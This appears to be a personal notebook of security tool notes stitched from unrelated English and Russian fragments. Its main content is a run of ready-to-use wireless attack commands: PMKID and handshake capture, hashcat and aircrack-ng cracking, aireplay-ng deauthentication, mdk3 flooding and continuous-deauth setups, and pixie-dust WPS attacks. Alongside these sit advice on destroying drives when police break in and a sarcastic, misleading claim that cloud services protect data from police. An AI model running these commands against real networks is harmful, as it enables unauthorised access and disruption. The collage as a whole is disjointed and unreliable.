• more than one protocol to attack: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
• support parallelized connects.

Nmap performs a TCP SYN scan against the top 1,000 ports, as specified in the nmap-services file.

• -sn - ICMP echo (not broadcast), TCP SYNC 443, PCP ACK to port 80
  • nmap -sn 192.168.0.1/24

nping -c 1 –tcp -p 80,433 scanme.nmap.org google.com

template

• -T paranoid|sneaky|polite|normal|aggressive|insane - timing template
• -T n - where n is paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5)

fine-grained - only affect port scans and host discovery scans. Other features like OS detection implement their own timing.

• –min-rate number
  • –min-rate 300 means that Nmap will try to keep the sending rate at or above 300 packets per second.
• –max-rate number
  • –max-rate 0.1 for a slowcan of one packet every ten seconds

set an upper limit on total scan time –max-retries

Specify –host-timeout with the maximum amount of time you are willing to wait. For example, specify 30m to ensure that Nmap doesn't waste more than half an hour on a single host.

Nmap Scripting Engine (NSE) https://www.lua.org/manual/5.3/

usr/share/nmap/scripts

invocation:

nmap -sC --script-args 'user=foo,pass=",{}=bar",paths={/admin,/cgi-bin},xmpp-info.server_name=localhost'

Channel Hopping - capture while hopping through multiple channels

• need handshake packages captured
• You can force a client to re-authenticate again with a lot of tools so you will instantly get this.

• https://wiki.installgentoo.com/wiki/Breaking_WPA2

• tcpdump -D - devices list
• tcpdump -w tcpdump icmp -i 1 - dump device 1

• https://hashcat.net/forum/thread-10253.html
• all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)
• Pairwise Master Key Identifier (PMKID)-based roaming features enabled
• on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.
• Robust Security Network is a protocol for establishing secure communications over an 802.11 wireless network and has PMKID, the key needed to establish a connection between a client and an access point, as one of its capabilities.
• hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
  • $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
  • https://github.com/ZerBea/hcxdumptool
• converted into a hash format accepted by Hashcat.
  • $ ./hcxpcaptool -z test.16800 test.pcapng
  • https://github.com/ZerBea/hcxtools
    • require libssl-dev
• e Hashcat (v4.2.0 or higher
  • ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
  • https://github.com/hashcat/hashcat
• PMKID-based roaming features enabled … using IEEE 802.11i/p/r protocols.
• WLAN vendors which send the PMKID in the first message of the 4-way handhake should consider to remove the PMKID in WPA2 PSK configured WLANs (non-802.11r). This way the exploit is fully mitigated.
• If you are an 802.11r user in combination with PSK, reflect453 if this is really necessary. [Or] disable WPA2 Personal in your network completely and rely on WPA2 Enterprise using a secure EAP method (e.g. EAP-TLS, PEAP, EAP-TTLS).
• https://techbeacon.com/security/wpa2-hack-allows-wi-fi-password-crack-much-faster

steps

1. rc-service wpa_supplicant down
2. Get PMKIDs and / or EAPOL message pairs
   • hcxdumptool -i interface -o dumpfile.pcapng –active_beacon –enable_status=15
3. Convert the traffic to hash format 22000:
   • hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
4. hashcat -m 22000 hash.hc22000 wordlist.txt # or cracked.txt.gz

capture and detect weakness

• git clone –depth=1 https://github.com/ZerBea/hcxdumptool

• app-crypt/hashcat
• app-crypt/hashcat-utils

• https://github.com/openwall/john

john -wordlist:wordlistmy.txt -rules –stdout |less

• wordlistmy.txt -source rules
• used /etc/john/john.conf - [List.Rules:Wordlist]

generate password rules

• Most people use easy to remember passwords, in this case it has to be 8 characters or over in length
• Append 0-9 to the word, i.e. (word)1, (word)2, (word)3, ..
• Sequence of numbers are often used, e.g. 123, 321, 999, ..
• First letter is often upper-case
• Short words (under 8 characters) are stringed in series of two, e.g. googlegoogle, hellohello, openopen, ..
• Forename and surname often used

app-crypt/johntheripper-jumbo

https://www.renderlab.net/projects/WPA-tables/

Захват PMKID with handshake

• airodump-ng wlp0s20f0u1 –channel 9 -w cap2

Взлом по словарю

• aircrack-ng -w test.dic test.pcap a-PMKID.pcap
  • test.dic - passwords list
  • test.pcap - full handshake
  • a-PMKID.pcap - PMKID not 00000000

Unauth

• start kismet
• get BSSID and client MAC
• aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon
  • -a BSSID
  • -c client MAC
• save PKID and handshake pcap

BFI (Beamforming Feedback Information) — функцию, введенную в 2013 году с выходом Wi-Fi 5 (802.11ac).

16 из 20 самых популярных паролей состоят только из цифр.

https://www.bleepingcomputer.com/news/security/new-wiki-eve-attack-can-steal-numerical-passwords-over-wifi/

https://en.kali.tools/?p=864 https://en.kali.tools/?p=394 https://github.com/DanMcInerney/wifijammer https://en.kali.tools/?p=90 https://packages.gentoo.org/packages/net-wireless/mdk https://github.com/aircrack-ng/mdk4 mdk3 $interface$mon d -b $path -c $ch

This floods the target AP with fake clients.

• mdk3 monX a -a xx:xx:xx:xx:xx:xx -m

This causes Michael failure, stopping all wireless traffic. However, this only works if the target AP supports TKIP. (Can be AES+TKIP)

• mdk3 monX m -t xx:xx:xx:xx:xx:xx

This keeps a continuous deauth on the network. If this attack does not start, make a blank text document in your root folder named blacklist. Leave it empty as MDK3 automatically populates the list.

• mdk3 monX d -b blacklist -c X

This floods a bunch of fake APs to any clients in range (only effective to windows clients and maybe some other devices, Macs are protected against this).

• mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X

You will know when the AP has reset either by checking with

• wash -i monX -C

you should have a total of 5 windows open at the same time: 1- airodump 2- mdk3 a 3- mdk3 b 4- mdk3 d 5- mdk3 m

I generally like to use: mdk3 monX -a 00:11:22:33:44:55 -m mdk3 monX d -b blacklist -c X mdk3 monX b -t 00:11:22:33:44:55 -c X

WPA-TKIP then also include: mdk3 monX m -t 00:11:22:33:44:55

• pixiewps https://github.com/wiire-a/pixiewps
  • pixiewps - WPS PIN exploiting the low or non-existing entropy of some software implementations
    • seconds or minutes, depending on the target, if vulnerable.
  • pixie-dust attack
  • https://github.com/wiire-a/pixiewps/wiki
  • https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool
  • https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
  • https://opensourcelibs.com/lib/pixiewps
  • https://axcheron.github.io/hacking-wps-using-reaver-and-pixie-dust-attack/
• WPS brute force https://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/

Reaver was going in ascending order for generating the pins and Bully always got a random pin. gets early while guessing randomly

bully -b 00:23:69:48:33:95

• airbase-ng - WEP, WPA, AP mode, send/encrypt packages
• aircrack-ng -
• airdecap-ng - decrypt WEP/WPA/WPA2 capture files
• airdecloak-ng - WEP - remove clocking
• airdrop-ng - deauthentication of users
• aireplay-ng - WPA2 deauthentications attacks
• airgraph-ng - Client to AP Relationship, all probed SSID by clients
• airmon-ng - start monitor mode
• airodump-ng
• airolib-ng
• airserv-ng
• airtun-ng
• besside-ng
• dcrack
• easside-ng
• packetforge-ng
• tkiptun-ng
• wesside-ng

fake AP

monitor mode

• airmon-ng check
• airmon-ng check kill
• airmon-ng start wlan0 1

packet capture - raw 802.11 frames

• airodump-ng -c <channel> –bssid <mac of AP> -w file_prefix <interface>

• aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

• emerge media-gfx/graphviz

usage

1. airodump-ng wlan0mon -w /root/Desktop/test
2. airmon-ng stop wlan0mon
3. airgraph-ng -i test-01.csv -o airgraph-test -g CARP

• https://wiki.installgentoo.com/wiki/Breaking_WPA2
• https://www.aircrack-ng.org/doku.php?id=tutorial

• wlan.fc.type==0 and wlan.fc.subtype==8 - beacon
• wlan.fc.type==0 and wlan.fc.subtype==4 - Probe request
• wlan.fc.type==0 and wlan.fc.subtype==5 - Probe response
• wlan.fc.type==1 and wlan.fc.subtype==13 - Acknowledgement
• wlan.fc.type==1 and wlan.fc.subtype==11 - RTS ready to send
• wlan.fc.type==1 and wlan.fc.subtype==12 - CTS Clear to send
• wlan.fc.addr - client MAC
• wlan.fc.ta - transmitter MAC
• wlan.fc.ra - receiver MAC
• wlan.fc.sa - source MAC
• wlan.fc.da - destination MAC
• wlan.bssid - BSSID MAC
• wlan_mgt.ssid == "SSID here"
• radiotap.channel.freq == 5240 - frequency
• radiotap.datarate <= 6 - filter by data rate in Mbps
• radiotap.dbm_antsignal >= -60 - filter by signal strength in dBm

• emerge –ask net-analyzer/wireshark
• gpasswd -a $USER pcap
• gui require USE=qt5

Edit -> Preference:

• Name Resolution -> Use an external network name resolver

• tshark - Dump and analyze network traffic
• capinfos - Prints information about capture files
• captype - Prints the types of capture files
• dumpcap - Dump network traffic
• editcap - Edit and/or translate the format of capture files
• idl2wrs - CORBA IDL to Wireshark Plugin Generator
• mergecap - Merges two or more capture files into one
• randpkt - Random packet generator
• rawshark - Dump and analyze raw pcap data
• reordercap - Reorder input file by timestamp into output file
• sharkd - ??
• text2pcap - Generate a capture file from an ASCII hexdump of packets

• <flag name="androiddump">Install androiddump, an extcap interface to capture from Android devices</flag>
• <flag name="bcg729">Use <pkg>media-libs/bcg729</pkg> for G.729 codec support in RTP Player</flag>
• <flag name="brotli">Use <pkg>app-arch/brotli</pkg> for compression/decompression</flag>
• <flag name="capinfos">Install capinfos, to print information about capture files</flag>
• <flag name="captype">Install captype, to print the file types of capture files</flag>
• <flag name="ciscodump">Install ciscodump, extcap interface to capture from a remote Cisco router</flag>
• <flag name="dftest">Install dftest, to display filter byte-code, for debugging dfilter routines</flag>
• <flag name="dpauxmon">Install dpauxmon, an external capture interface (extcap) that captures DisplayPort AUX channel data from linux kernel drivers</flag>
• <flag name="dumpcap">Install dumpcap, to dump network traffic from inside wireshark</flag>
• <flag name="editcap">Install editcap, to edit and/or translate the format of capture files</flag>
• <flag name="http2">Use <pkg>net-libs/nghttp2</pkg> for HTTP/2 support</flag>
• <flag name="ilbc">Build with iLBC support in RTP Player using <pkg>media-libs/libilbc</pkg></flag>
• <flag name="libxml2">Use <pkg>dev-libs/libxml2</pkg> for handling XML configuration in dissectors</flag>
• <flag name="lto">Enable link time optimization</flag>
• <flag name="maxminddb">Use <pkg>dev-libs/libmaxminddb</pkg> for IP address geolocation</flag>
• <flag name="mergecap">Install mergecap, to merge two or more capture files into one</flag>
• <flag name="minizip">Build with zip file compression support</flag>
• <flag name="netlink">Use <pkg>dev-libs/libnl</pkg></flag>
• <flag name="pcap">Use <pkg>net-libs/libpcap</pkg> for network packet capturing (build dumpcap, rawshark)</flag>
• <flag name="plugin-ifdemo">Install plugin interface demo</flag>
• <flag name="plugins">Install plugins</flag>
• <flag name="randpkt">Install randpkt, a utility for creating pcap trace files full of random packets</flag>
• <flag name="randpktdump">Install randpktdump, an extcap interface to provide access to the random packet generator (randpkt)</flag>
• <flag name="reordercap">Install reordercap, to reorder input file by timestamp into output file</flag>
• <flag name="sbc">Use <pkg>media-libs/sbc</pkg> for playing back SBC encoded packets</flag>
• <flag name="sdjournal">Install sdjournal, an extcap that captures systemd journal entries</flag>
• <flag name="sharkd">Install sharkd, the daemon variant of wireshark</flag>
• <flag name="smi">Use <pkg>net-libs/libsmi</pkg> to resolve numeric OIDs into human readable format</flag>
• <flag name="spandsp">Use <pkg>media-libs/spandsp</pkg> for for G.722 and G.726 codec support in the RTP Player</flag>
• <flag name="sshdump">Install sshdump, an extcap interface to capture from a remote host through SSH</flag>
• <flag name="text2pcap">Install text2pcap, to generate a capture file from an ASCII hexdump of packets</flag>
• <flag name="tfshark">Install tfshark, a terminal-based version of the FileShark capability</flag>
• <flag name="tshark">Install tshark, to dump and analyzer network traffic from the command line</flag>
• <flag name="udpdump">Install udpdump, to get packets exported from a source (like a network device or a GSMTAP producer) that are dumped to a pcap file</flag>

• https://mrncciew.com/2014/08/16/decrypt-wpa2-psk-using-wireshark/

1. message: EAPOL protocl
2. Authentication
3. WPA Key Data
4. Tag: Vendor Specific
5. PMKID

Just store everything on random access memory and a backed up power supply with a kill switch.

It takes 10 seconds without power to erase random access memory.

If you need to turn off power for a while, you can transfer stuff from RAM to a hard drive, reboot, then transfer it back to ram and wipe the drives.

There's already a kill power program to kill power if there's an undetected USB port connection I think.

Unless you're extremely important, they're not going to send someone to manually crack your password and disable the kill switch program.

You might be able to adjust the mobo voltage variance to be lower too so it shuts off if they try to manually attach something to the mobo without a port.

But all this is kind of redundant because if they set up pinhole cameras in your place they can just record everything you're doing on the computer screen itself.

They look like little pin holes and are usually in the corners of rooms near the ceiling.

They can also put microphones in that way.

You can make them all inoperable by just painting.

If you're in an apartment or something, they'll rent or buy the apartment next door and drill through the walls to put them in.

Use trusted cloud services like Google Cloud or Apple iCloud or Telegram Saved Messages, they protect your data from hackers and police with military-grade bulletproof encryption and redundant copies stored in multiple locations around the world. It's the industry-wide practice. Keep it simple, you silly kiddo.

If they break your door down, make sure to destroy your drives if you are concerned they will hold you prisoner until you hand over the keys. Make sure to get a good lawyer before any questioning of course. Do not give a single thing other than your name and DOB after arrest. In most "free" countries, you are obligated to unlock the drives if they have any suspicion of you. Muh UK can give you 5 years in prison just for refusing in the name of national security. It's better that the data no longer exists.

If you want to store remotely on "the cloud", you can still do that relatively safely. Connect to one over anon network and upload files that you have encrypted with your own passphrase before uploading. Try to not give any personal information over to the service. I already do some file backups in this way for a file storage service.

“forensic mode”

• internal hard disk is never touched
• auto-mounting of removable media is disabled. (USB, CD - nothing should happen to any media without direct user action)

https://www.tutorialspoint.com/kali_linux/index.htm

• Metasploit
• Maltego - network analysis
• Wireshark - packet sniffing
• Netcat - TCP and UDP protocols for things like port scanning or creating backdoor channels

https://www.pentoo.ch

• default for expoiting
• hardenes
• bleeding_edge

USB stick of 8 GB minimum

Tor os

• can save some of your files and configuration in an encrypted Persistent Storage on the USB stick
• never writes anything to the hard disk and only runs from the memory of the computer
• Tor Browser with uBlock
• Thunderbird, for encrypted emails
• KeePassXC, to create and store strong passwords
• LibreOffice, an office suite
• OnionShare, to share files over Tor
• Applications are blocked automatically if they try to connect to the Internet without Tor.
• Everything in the Persistent Storage is encrypted automatically.

https://blackarch.org/tools.html

• Cracker - gain unauthorized access to a computer in order to commit another crime such as destroying information contained in that system
• White hat - non-malicious reasons, either to test their own security system, perform penetration tests or vulnerability assessments for a client, or while working for a security company which makes security software
• Black hat - who "violates computer security for little reason beyond maliciousness or for personal gain", not criminal hacker
• Grey hat - between a black hat and a white hat hacker
• Elite hacker -
• Script kiddie, s'kiddie, skid - unskilled hacker WinNuke, Back Orifice, NetBus, Sub7, Metasploit, ProRat, PassJacker, iStealer, Snoopy
• Neophyte - ("newbie", or "noob") -
• Blue hat - used to bug-test a system prior to its launch. Microsoft red-team, blue-team concept.
• Hacktivist -
• Nation state - Intelligence agencies and cyberwarfare operatives of nation states
• Organized criminal gangs

LLMNR Poisoning -

LLMNR - protocol for name resolution, successor to NetBIOS. (when DNS resolution fails).

• no authentication mechanism. Anyone can respond to an LLMNR request.

https://github.com/farhanashrafdev/90DaysOfCyberSecurity

День 1–7: сети. Подготовка к экзамену CompTIA Network+ (N10-008).

День 8–14: безопасность. Подготовка к экзамену ​​CompTIA Security+ (SY0-601).

День 15–28: Linux. Изучение основ работы с Linux.

День 29–42: Python. Изучение программирования на Python с помощью профильных блогов, курса от Codecademy, книги «Лёгкий способ выучить Python» от Зеда Шоу и задач на Hacker Rank.

День 43–56: анализ трафика. Курсы от Wireshark и статьи по работе с tcpdump.

День 57–63: Git. Курс от Codecademy и документация от GitHub.

День 64–70: ELK-стек. Обучающие материалы от logz.io и Elastic.

День 71–77: Google Cloud Platform, Amazon Web Services или Azure на выбор. Учиться работать с ними автор плана предлагает по официальной документации сервисов.

День 85–90: хакинг. Курсы от Hack the Box и лекции по этичному хакингу на YouTube.

День 91–92: резюме. Советы по составлению резюме и шаблоны.

День 93–95: поиск работы.

LLM + Tools + Documents + History

LLM agent - a system that can use an LLM to reason through a problem, create a plan to solve the problem, and execute the plan with the help of a set of tools

lanning/reacting can be as simple as feeding the outputs of the tools/APIs back to the model as further context.